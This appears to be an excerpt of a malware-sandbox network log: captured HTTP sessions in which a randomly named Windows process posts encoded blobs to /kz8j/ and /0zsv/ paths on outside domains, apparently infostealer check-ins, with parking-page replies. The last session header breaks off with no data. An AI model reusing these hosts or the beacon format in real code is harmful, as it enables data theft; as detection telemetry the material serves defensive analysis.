                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        35192.168.2.4500373.33.130.190805332C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 4, 2024 10:13:01.905317068 CET10852OUTPOST /kz8j/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                        Accept-Language: en-US,en;q=0.5
                                                        Accept-Encoding: gzip, deflate, br
                                                        Host: www.dwmdconsulting.llc
                                                        Origin: http://www.dwmdconsulting.llc
                                                        Content-Length: 10300
                                                        Connection: close
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Cache-Control: max-age=0
                                                        Referer: http://www.dwmdconsulting.llc/kz8j/
                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/600.4.10 (KHTML, like Gecko) Version/6.2.4 Safari/537.85.13
                                                        Data Raw: 51 38 72 3d 64 69 69 4d 2f 56 53 4c 70 53 45 79 39 42 7a 54 37 53 56 68 44 6d 36 69 47 42 6a 4c 55 4d 4b 71 58 6d 50 37 42 30 70 53 55 62 78 35 43 6a 2f 4b 67 64 59 76 62 4a 56 4f 4e 45 70 62 70 4f 78 4c 70 34 39 50 48 31 63 33 68 4d 6e 38 4d 45 73 79 67 4d 68 36 78 4f 51 64 61 39 35 6c 54 73 47 63 45 2b 4b 4d 4f 42 39 65 4e 79 36 51 75 6d 78 38 4d 4f 65 52 56 4e 6c 57 56 47 4e 6e 36 75 5a 6a 77 50 36 56 76 78 35 4c 74 55 4b 37 4a 6e 56 56 4f 4c 76 7a 4a 57 74 55 6e 6a 43 52 32 33 47 7a 53 78 37 38 56 65 75 79 79 59 61 47 63 70 4f 37 59 59 50 61 46 41 50 6f 65 4c 6a 57 61 6e 68 57 55 45 78 4d 75 77 76 62 32 6c 42 35 68 48 73 7a 47 67 39 59 75 32 46 56 70 64 38 2b 68 79 6e 56 46 62 61 62 67 34 51 73 4a 37 50 30 5a 4f 5a 54 73 77 35 38 4a 4a 6a 37 4e 57 51 71 79 76 4d 50 6e 68 50 38 45 5a 59 31 58 67 30 2b 4c 71 4c 44 51 31 79 6e 78 64 66 41 6e 31 56 4c 51 6f 6e 72 4c 54 52 61 34 2b 54 6c 74 30 4f 6a 6e 38 4a 69 57 67 52 50 42 78 43 6e 45 71 4e 33 48 4f 5a 54 44 78 69 65 75 79 43 56 58 41 31 5a 64 68 [TRUNCATED]
                                                        Data Ascii: Q8r=diiM/VSLpSEy9BzT7SVhDm6iGBjLUMKqXmP7B0pSUbx5Cj/KgdYvbJVONEpbpOxLp49PH1c3hMn8MEsygMh6xOQda95lTsGcE+KMOB9eNy6Qumx8MOeRVNlWVGNn6uZjwP6Vvx5LtUK7JnVVOLvzJWtUnjCR23GzSx78VeuyyYaGcpO7YYPaFAPoeLjWanhWUExMuwvb2lB5hHszGg9Yu2FVpd8+hynVFbabg4QsJ7P0ZOZTsw58JJj7NWQqyvMPnhP8EZY1Xg0+LqLDQ1ynxdfAn1VLQonrLTRa4+Tlt0Ojn8JiWgRPBxCnEqN3HOZTDxieuyCVXA1ZdhOHjgWE9uKX21WaYF67Z/Bcs1lnLafUU3y4MxCS021LFpIYLw1hOdi8fbh8O7yJNhr1TTE1WHFF7SeTcC7PZhNAm4v0Os5+SAM8gEr1QebdiXnIvQkWj0XDNz077q9jRdWG+HrR4Zn5cgHC+j8kOR56MqJbLySGRuTOLCu908pkJUArtwOkZVu4hxZmOrdkCzb69I/qKTFvZKVnkt0rWAUaIHPME2IELWwBVaJI4Yo68YdqTcEcDODBfVvlwDMD6kl7AUbEyQEiqYTwq9tOToxbzK1a6Msm9g5nI6fq1ceLrY5dI3wUDiHh0u4LDK64C9Us3MuKHlnki20ko2ShjJp8tAZjmzfR+YwrkGI3uu6aC8ILII0bRhHrfAs1LBXpIgXhHnhXxEONYI0M8x/+/uDsX2aBYPa9LE15j4OefNFTZAo4Yy+bSSA27876mnEmHfCThA6ZrYerY8wW2qaMnD6LG7NMKBQ6wlDNvvbYXrUcMF/P8+5qgUuyj74ZQFJ16zksUvsBrsR4PN0QItVEsrumjwS/WGqyK52NqOppfvDBQyRF90BdA1x7eUOLLqzLjBTnnjSAJKPZjwUIfHqaG/SXa6+OL9zQn1BRZpZJ5EqdYoOg/dKhqyDeiopuHibexaVBEbDNK5F9714WtHFMW2BGOx0jB1agciOF [TRUNCATED]


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        36192.168.2.4500383.33.130.190805332C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 4, 2024 10:13:04.536524057 CET470OUTGET /kz8j/?Q8r=QgKs8ib8pSkW+zKBwipCHX7UMUqMF7yADzXTDGJ0XdB6OCHQraJ+KZU3DxhMouRtg+08egxU0v/OLmtErrB1+9oqLfJkb4rbcOK0NiMrGSL51W8rMrC8dsw=&6trpq=anQT3n HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                        Accept-Language: en-US,en;q=0.5
                                                        Host: www.dwmdconsulting.llc
                                                        Connection: close
                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/600.4.10 (KHTML, like Gecko) Version/6.2.4 Safari/537.85.13
                                                        Nov 4, 2024 10:13:12.176579952 CET392INHTTP/1.1 200 OK
                                                        Server: openresty
                                                        Date: Mon, 04 Nov 2024 09:13:12 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 252
                                                        Connection: close
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 51 38 72 3d 51 67 4b 73 38 69 62 38 70 53 6b 57 2b 7a 4b 42 77 69 70 43 48 58 37 55 4d 55 71 4d 46 37 79 41 44 7a 58 54 44 47 4a 30 58 64 42 36 4f 43 48 51 72 61 4a 2b 4b 5a 55 33 44 78 68 4d 6f 75 52 74 67 2b 30 38 65 67 78 55 30 76 2f 4f 4c 6d 74 45 72 72 42 31 2b 39 6f 71 4c 66 4a 6b 62 34 72 62 63 4f 4b 30 4e 69 4d 72 47 53 4c 35 31 57 38 72 4d 72 43 38 64 73 77 3d 26 36 74 72 70 71 3d 61 6e 51 54 33 6e 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?Q8r=QgKs8ib8pSkW+zKBwipCHX7UMUqMF7yADzXTDGJ0XdB6OCHQraJ+KZU3DxhMouRtg+08egxU0v/OLmtErrB1+9oqLfJkb4rbcOK0NiMrGSL51W8rMrC8dsw=&6trpq=anQT3n"}</script></head></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        37192.168.2.450039199.59.243.227805332C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 4, 2024 10:13:17.325706959 CET726OUTPOST /0zsv/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                        Accept-Language: en-US,en;q=0.5
                                                        Accept-Encoding: gzip, deflate, br
                                                        Host: www.deepfy.xyz
                                                        Origin: http://www.deepfy.xyz
                                                        Content-Length: 200
                                                        Connection: close
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Cache-Control: max-age=0
                                                        Referer: http://www.deepfy.xyz/0zsv/
                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/600.4.10 (KHTML, like Gecko) Version/6.2.4 Safari/537.85.13
                                                        Data Raw: 51 38 72 3d 7a 6d 51 49 70 78 5a 68 44 73 51 6f 71 37 46 38 43 67 37 33 36 35 45 58 4e 39 51 71 73 78 35 4a 56 2b 43 51 38 4d 42 52 49 48 2b 33 33 67 6b 6a 6c 61 38 37 6f 54 48 75 6a 35 45 74 30 55 31 51 56 6e 49 62 61 44 2f 61 4f 6c 7a 34 6b 77 36 61 76 33 2f 2b 63 6a 4c 48 4e 42 54 36 54 65 2f 55 74 36 50 2b 4e 66 67 53 71 78 70 6a 79 37 6f 2b 5a 58 4d 52 6a 56 51 45 55 41 44 67 6d 45 42 57 30 6a 62 51 31 67 73 57 39 38 65 52 51 4a 66 78 42 53 39 6f 6c 75 56 66 70 39 55 74 54 7a 6f 4e 45 75 31 47 34 32 47 2b 36 53 6b 4f 63 6f 47 58 61 54 66 47 44 44 61 62 63 6a 68 7a 45 70 57 68 59 77 3d 3d
                                                        Data Ascii: Q8r=zmQIpxZhDsQoq7F8Cg7365EXN9Qqsx5JV+CQ8MBRIH+33gkjla87oTHuj5Et0U1QVnIbaD/aOlz4kw6av3/+cjLHNBT6Te/Ut6P+NfgSqxpjy7o+ZXMRjVQEUADgmEBW0jbQ1gsW98eRQJfxBS9oluVfp9UtTzoNEu1G42G+6SkOcoGXaTfGDDabcjhzEpWhYw==
                                                        Nov 4, 2024 10:13:17.958456993 CET1236INHTTP/1.1 200 OK
                                                        date: Mon, 04 Nov 2024 09:13:17 GMT
                                                        content-type: text/html; charset=utf-8
                                                        content-length: 1110
                                                        x-request-id: 2d3725b6-2b3b-4cef-ae9b-bc275411c3e6
                                                        cache-control: no-store, max-age=0
                                                        accept-ch: sec-ch-prefers-color-scheme
                                                        critical-ch: sec-ch-prefers-color-scheme
                                                        vary: sec-ch-prefers-color-scheme
                                                        x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Auk32KrU/WnU7zyHbwWAQ0QNQip8gpi54EH0GDlYt8hRl9HXynbqmE8CPMqnbkJNlhnfhpooyFE5NItUl8CpSA==
                                                        set-cookie: parking_session=2d3725b6-2b3b-4cef-ae9b-bc275411c3e6; expires=Mon, 04 Nov 2024 09:28:17 GMT; path=/
                                                        connection: close
                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 41 75 6b 33 32 4b 72 55 2f 57 6e 55 37 7a 79 48 62 77 57 41 51 30 51 4e 51 69 70 38 67 70 69 35 34 45 48 30 47 44 6c 59 74 38 68 52 6c 39 48 58 79 6e 62 71 6d 45 38 43 50 4d 71 6e 62 6b 4a 4e 6c 68 6e 66 68 70 6f 6f 79 46 45 35 4e 49 74 55 6c 38 43 70 53 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                        Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Auk32KrU/WnU7zyHbwWAQ0QNQip8gpi54EH0GDlYt8hRl9HXynbqmE8CPMqnbkJNlhnfhpooyFE5NItUl8CpSA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                        Nov 4, 2024 10:13:17.958533049 CET563INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                        Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMmQzNzI1YjYtMmIzYi00Y2VmLWFlOWItYmMyNzU0MTFjM2U2IiwicGFnZV90aW1lIjoxNzMwNzExNT


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        38192.168.2.450040199.59.243.227805332C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 4, 2024 10:13:19.879949093 CET746OUTPOST /0zsv/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                        Accept-Language: en-US,en;q=0.5
                                                        Accept-Encoding: gzip, deflate, br
                                                        Host: www.deepfy.xyz
                                                        Origin: http://www.deepfy.xyz
                                                        Content-Length: 220
                                                        Connection: close
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Cache-Control: max-age=0
                                                        Referer: http://www.deepfy.xyz/0zsv/
                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/600.4.10 (KHTML, like Gecko) Version/6.2.4 Safari/537.85.13
                                                        Data Raw: 51 38 72 3d 7a 6d 51 49 70 78 5a 68 44 73 51 6f 71 62 31 38 41 41 48 33 72 4a 45 49 48 64 51 71 6d 52 35 46 56 2b 4f 51 38 4e 46 37 49 31 71 33 33 41 30 6a 6b 59 55 37 34 44 48 75 37 70 45 73 37 30 31 58 56 6e 45 70 61 48 2f 61 4f 6c 58 34 6b 78 4b 61 76 68 33 39 63 7a 4c 42 5a 78 54 34 64 2b 2f 55 74 36 50 2b 4e 66 30 34 71 78 52 6a 79 49 67 2b 66 43 34 57 2f 46 51 48 58 41 44 67 69 45 42 53 30 6a 61 48 31 6c 30 73 39 36 61 52 51 4d 62 78 42 44 39 72 79 65 56 6a 6e 64 56 45 65 47 77 43 4f 4d 35 47 36 6e 6d 75 39 79 63 69 51 4f 4c 4e 4c 69 2b 52 52 44 2b 6f 42 6b 6f 48 4a 71 72 6f 44 36 42 67 76 66 45 57 2f 46 36 39 30 4e 49 39 62 43 47 70 42 52 6b 3d
                                                        Data Ascii: Q8r=zmQIpxZhDsQoqb18AAH3rJEIHdQqmR5FV+OQ8NF7I1q33A0jkYU74DHu7pEs701XVnEpaH/aOlX4kxKavh39czLBZxT4d+/Ut6P+Nf04qxRjyIg+fC4W/FQHXADgiEBS0jaH1l0s96aRQMbxBD9ryeVjndVEeGwCOM5G6nmu9yciQOLNLi+RRD+oBkoHJqroD6BgvfEW/F690NI9bCGpBRk=
                                                        Nov 4, 2024 10:13:20.518059015 CET1236INHTTP/1.1 200 OK
                                                        date: Mon, 04 Nov 2024 09:13:19 GMT
                                                        content-type: text/html; charset=utf-8
                                                        content-length: 1110
                                                        x-request-id: 76e203d0-e89d-45e9-a6c4-e79db1ba44fc
                                                        cache-control: no-store, max-age=0
                                                        accept-ch: sec-ch-prefers-color-scheme
                                                        critical-ch: sec-ch-prefers-color-scheme
                                                        vary: sec-ch-prefers-color-scheme
                                                        x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Auk32KrU/WnU7zyHbwWAQ0QNQip8gpi54EH0GDlYt8hRl9HXynbqmE8CPMqnbkJNlhnfhpooyFE5NItUl8CpSA==
                                                        set-cookie: parking_session=76e203d0-e89d-45e9-a6c4-e79db1ba44fc; expires=Mon, 04 Nov 2024 09:28:20 GMT; path=/
                                                        connection: close
                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 41 75 6b 33 32 4b 72 55 2f 57 6e 55 37 7a 79 48 62 77 57 41 51 30 51 4e 51 69 70 38 67 70 69 35 34 45 48 30 47 44 6c 59 74 38 68 52 6c 39 48 58 79 6e 62 71 6d 45 38 43 50 4d 71 6e 62 6b 4a 4e 6c 68 6e 66 68 70 6f 6f 79 46 45 35 4e 49 74 55 6c 38 43 70 53 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                        Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Auk32KrU/WnU7zyHbwWAQ0QNQip8gpi54EH0GDlYt8hRl9HXynbqmE8CPMqnbkJNlhnfhpooyFE5NItUl8CpSA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                        Nov 4, 2024 10:13:20.518219948 CET563INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                        Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNzZlMjAzZDAtZTg5ZC00NWU5LWE2YzQtZTc5ZGIxYmE0NGZjIiwicGFnZV90aW1lIjoxNzMwNzExNj


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        39192.168.2.450041199.59.243.227805332C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 4, 2024 10:13:22.784719944 CET10828OUTPOST /0zsv/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                        Accept-Language: en-US,en;q=0.5
                                                        Accept-Encoding: gzip, deflate, br
                                                        Host: www.deepfy.xyz
                                                        Origin: http://www.deepfy.xyz
                                                        Content-Length: 10300
                                                        Connection: close
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Cache-Control: max-age=0
                                                        Referer: http://www.deepfy.xyz/0zsv/
                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/600.4.10 (KHTML, like Gecko) Version/6.2.4 Safari/537.85.13
                                                        Data Raw: 51 38 72 3d 7a 6d 51 49 70 78 5a 68 44 73 51 6f 71 62 31 38 41 41 48 33 72 4a 45 49 48 64 51 71 6d 52 35 46 56 2b 4f 51 38 4e 46 37 49 31 53 33 33 53 4d 6a 6c 35 55 37 71 54 48 75 6c 35 45 68 37 30 30 4c 56 6e 73 58 61 48 37 4b 4f 6e 2f 34 6c 58 65 61 2f 44 66 39 58 7a 4c 42 62 78 54 39 54 65 2f 42 74 36 66 36 4e 66 6b 34 71 78 52 6a 79 4a 51 2b 4f 58 4d 57 76 31 51 45 55 41 44 73 6d 45 41 50 30 6a 53 58 31 6c 34 38 38 4b 36 52 52 73 72 78 48 78 56 72 75 4f 56 62 67 64 56 63 65 47 31 43 4f 4d 55 39 36 6e 53 45 39 78 41 69 54 59 58 51 65 68 2b 6e 4c 51 75 56 62 56 38 39 4b 6f 58 64 46 39 31 55 76 73 64 4c 6e 45 72 66 78 4f 67 32 4d 67 6e 72 51 57 2f 72 74 72 6b 44 67 44 37 4f 53 58 67 36 43 2f 31 53 41 38 44 4a 6e 33 4b 32 66 65 46 55 49 72 6f 61 59 51 61 51 6a 34 45 77 50 72 43 42 4a 73 73 4b 38 44 52 2f 67 67 6a 4b 6e 31 4b 6e 68 33 42 79 62 33 46 50 4c 37 59 34 5a 30 7a 61 42 79 33 43 67 69 68 61 74 45 5a 54 41 43 52 30 4e 53 4f 72 48 6e 51 5a 45 77 63 6c 63 39 44 5a 69 62 4f 49 43 35 4d 46 63 36 [TRUNCATED]
                                                        Data Ascii: Q8r=zmQIpxZhDsQoqb18AAH3rJEIHdQqmR5FV+OQ8NF7I1S33SMjl5U7qTHul5Eh700LVnsXaH7KOn/4lXea/Df9XzLBbxT9Te/Bt6f6Nfk4qxRjyJQ+OXMWv1QEUADsmEAP0jSX1l488K6RRsrxHxVruOVbgdVceG1COMU96nSE9xAiTYXQeh+nLQuVbV89KoXdF91UvsdLnErfxOg2MgnrQW/rtrkDgD7OSXg6C/1SA8DJn3K2feFUIroaYQaQj4EwPrCBJssK8DR/ggjKn1Knh3Byb3FPL7Y4Z0zaBy3CgihatEZTACR0NSOrHnQZEwclc9DZibOIC5MFc6cHi+KnJa7kjSZr/CVQ1kC/HEQT1dd2/vbGbfN0fetEp+y0M3zivOya5608Y0MWiViGNN+yQcVCVYAFxlIXyyyDqfZhHqbM1ZP4INnP6oQQ/rCjVasNzPZUFv/xybffQTxzbdLUu1CAIB7qEFk09gIYMvew9Ksm76BvKeKZiGLtnPdYmVtj2fC5XTcQlDCTJ1g+KdJNbjXv/pHQ60qDA9XAtR65547U2Ap+Z1VBb1tK+tHMscMmBUbtlq61Qne1BHiM6V5LQz61OK4QKwxweYJCftbX8sxJeOZDpTcmyp4p8XOKTdSMDzg1wbZed4ltySB6xCs8okUYJd8X6j8dNx5gLmbo48ZLzYnwdpOigkUnORX/IlR/OTodzf7iZNgu4+tVL4t9H18B8BlDEVd9Y6GLKLkIpGr2mMMaz/QSvHt+Fxy87kPf0r2d9DKjOJIezVwynlw0FQHoKE/Cs3fCjPCc7PiwtNTC9aISbqh6m6wxZu7ZQY/kTtvCxvi/DlMbaRyphEGCwsv8O35SX61qPV+tNvLjTmWjgyEeJz5r13LROGxki9KFEwCbXVuJtFTu9s/TxL4w5miZEMS1xMm8AbisrhnvgKlYOHQ/vZ2m3GrhE6NiLyzDu2y+R2+C4LUQvZ/tzqE/rgEe+Tv70VBHXrPFuID6XLFD1A2O [TRUNCATED]
                                                        Nov 4, 2024 10:13:23.438755035 CET1236INHTTP/1.1 200 OK
                                                        date: Mon, 04 Nov 2024 09:13:23 GMT
                                                        content-type: text/html; charset=utf-8
                                                        content-length: 1110
                                                        x-request-id: 65e8f462-883d-4da8-95ab-3160b1f030ae
                                                        cache-control: no-store, max-age=0
                                                        accept-ch: sec-ch-prefers-color-scheme
                                                        critical-ch: sec-ch-prefers-color-scheme
                                                        vary: sec-ch-prefers-color-scheme
                                                        x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Auk32KrU/WnU7zyHbwWAQ0QNQip8gpi54EH0GDlYt8hRl9HXynbqmE8CPMqnbkJNlhnfhpooyFE5NItUl8CpSA==
                                                        set-cookie: parking_session=65e8f462-883d-4da8-95ab-3160b1f030ae; expires=Mon, 04 Nov 2024 09:28:23 GMT; path=/
                                                        connection: close
                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 41 75 6b 33 32 4b 72 55 2f 57 6e 55 37 7a 79 48 62 77 57 41 51 30 51 4e 51 69 70 38 67 70 69 35 34 45 48 30 47 44 6c 59 74 38 68 52 6c 39 48 58 79 6e 62 71 6d 45 38 43 50 4d 71 6e 62 6b 4a 4e 6c 68 6e 66 68 70 6f 6f 79 46 45 35 4e 49 74 55 6c 38 43 70 53 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                        Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Auk32KrU/WnU7zyHbwWAQ0QNQip8gpi54EH0GDlYt8hRl9HXynbqmE8CPMqnbkJNlhnfhpooyFE5NItUl8CpSA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                        Nov 4, 2024 10:13:23.438774109 CET563INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                        Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNjVlOGY0NjItODgzZC00ZGE4LTk1YWItMzE2MGIxZjAzMGFlIiwicGFnZV90aW1lIjoxNzMwNzExNj


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        40192.168.2.450042199.59.243.227805332C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe
                                                        TimestampBytes transferredDirectionData
